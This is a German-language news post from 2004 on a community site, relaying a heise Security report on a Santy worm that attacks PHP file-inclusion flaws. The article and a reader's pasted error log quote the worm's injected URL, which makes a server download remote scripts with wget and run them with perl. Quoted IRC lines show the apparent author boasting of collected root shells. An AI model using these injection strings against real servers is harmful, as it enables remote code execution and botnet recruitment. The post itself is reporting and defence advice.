| |
 |
|
 |
|
| / news / view / 299 |
640 Pagehits |
 |
|
|
 |
Wurm attackiert PHP-Skripte |
|
Erstellt von mix am 25.12.2004 19:48
|
Die bereits gestern gemeldete Santy-Version attackiert systematisch PHP-Skripte. Unter anderem verbindet sich der Wurm bei Erfolg mit einem IRC-Server und nimmt dort Befehle entgegen.
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten.
Siehe auch: Bericht auf Full Disclosure
|
|
|
| |
|
|
Du musst eingeloggt sein um Kommentare schreiben und Bewertungen abgeben zu können!
|
| Bewertung: |
 |
| Anzahl Bewertungen: |
0 |
| Anzahl Kommentare: |
4 |
|
| Erstellt von mix am 25.12.2004 19:50 |
Abgegebene Bewertung: |
| this only for test |
das sagt der, der das macht...(war aufm irc-server)
| ZITAT: |
[19:45:12] <+stdout> i do feel you could be putting a little more effort into the actual bot to make this little worm..more..useful? lol :}-
[19:45:41] <@ssh> yes
[19:45:46] <@ssh> this only for test
[19:45:50] <+stdout> ah
[19:45:56] <@ssh> the next will be powerfull
[19:46:19] <@ssh> ;d
|
| ZITAT: |
[19:49:10] <@ssh> stdout i just collect 20 shells root in good servers on good datacenters
[19:49:17] <@ssh> for next job
[19:49:57] <@ssh> the planet, everyone(ev1), managed, nac, he.net ...
[19:50:06] <@ssh> high spped intert link
[19:50:16] <@ssh> *internet
|
*grml* was es nicht alles für typen gibt :/ |
| Erstellt von fmj am 26.12.2004 00:44 |
Abgegebene Bewertung: |
| t-world error log |
| ZITAT: |
<errlog version="0.2.1"> <uri>/index.php/user/online//index.php/faq?PHPSESSID=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt</uri>
<time>2004-12-25 22:46:08</time>
<remoteip>82.165.34.203</remoteip>
<loglevel>1</loglevel>
<error>
<number>2</number>
<message>session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9</message>
<file>/home/www/web1/html/portal/libs/jacket/JacketSession.class.php</file>
<line>27</line>
<time>2004-12-25 22:46:08</time>
</error>
</errlog>
|
|
| Erstellt von mix am 26.12.2004 02:12 |
Abgegebene Bewertung: |
lol fmj  |
| Erstellt von mix am 26.12.2004 16:31 |
Abgegebene Bewertung: |
| ZITAT: |
Update:
Der Hoster der missbrauchten Site hat aufgrund der Benachrichtigung durch heise Security die Skripte entfernt. Das Problem ist jedoch längst nicht beseitigt. Denn mittlerweile sind weitere Varianten des Wurms aktiv, die Code von anderen Sites nachladen. Die neuen Varianten nutzen teilweise auch andere Suchmaschinen, um PHP-Skripte aufzuspüren.
Der Wurm nutzt einen weit verbreiteten Programmierfehler, der dazu führt, dass ein Angreifer Dateien mit PHP-Code nachladen und ausführen können. Das Problem ist als "File Inclusion Vulnerability" bekannt und betrifft viele PHP-Skripte, die inlude- oder require-Befehle mit nicht ausreichend geprüften Variablen einsetzen. Wer Zugriff auf die Konfiguration des Web-Servers hat, kann sich durch Abschalten der Option allow_url_fopen in der Konfigurationsdatei php.ini gegen solche Attacken schützen. Das beschränkt den Zugriff von PHP auf lokale Dateien. Es bleibt allerdings das Risiko, dass beispielsweise lokale Dateien ausgespäht werden. Deshalb ist es grundsätzlich erforderlich, alle Variablen, die extern gesetzt werden, sorgfältig zu prüfen. |
|
|
|
|
|
 |
|
 |
© 2005 by T-World Crew - Scripting and design by koeniglich.ch
Page rendered in 0,039767s
|
|
www.heise.de
